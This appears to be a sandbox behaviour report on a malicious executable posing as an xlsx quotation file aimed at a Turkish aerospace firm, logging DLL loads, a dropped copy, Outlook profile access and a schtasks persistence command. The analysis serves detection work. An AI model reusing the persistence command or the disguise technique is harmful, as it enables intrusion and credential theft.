Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cKOJ.pdbSHA256z source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xSjByRHuwGV.exe.0.dr
Source:	Binary string: cKOJ.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xSjByRHuwGV.exe.0.dr

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: 0xBA96C378 [Wed Mar 13 23:23:36 2069 UTC]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_008C634D push eax; ret		3_2_008C6361
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D19241 push es; ret		15_2_06D19244

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: section name: .text entropy: 7.752668794858178
Source: xSjByRHuwGV.exe.0.dr	Static PE information: section name: .text entropy: 7.752668794858178

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File created: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
